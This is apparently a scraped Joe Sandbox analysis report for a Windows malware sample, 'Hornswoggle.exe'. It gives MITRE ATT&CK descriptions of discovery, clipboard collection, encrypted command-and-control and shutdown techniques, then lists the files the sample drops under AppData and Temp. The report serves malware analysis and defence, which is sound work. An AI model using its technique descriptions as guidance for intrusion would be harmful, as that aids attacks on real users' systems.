Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Hornswoggle.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\justifikationssager.lnk

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22j0iksa.c4a.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ccpaf1wx.ii2.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qzztiy4l.vyy.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wl3n24ot.jsd.ps1

C:\Users\user\AppData\Local\Temp\nsr814E.tmp

C:\Users\user\AppData\Local\Temp\nsx8391.tmp\nsExec.dll

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls\rancheria.pro

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udateret90.Lis

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udfring53.lev

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Ungallantness.kok

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Yaply50.txt

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\skakpartiet.For

C:\Windows\Logs\SIH\SIH.20250102.083611.080.1.etl

C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\TMPCD1B.tmp

C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\sls.cab

C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMPD4A9.tmp

Windows Analysis Report
Hornswoggle.exe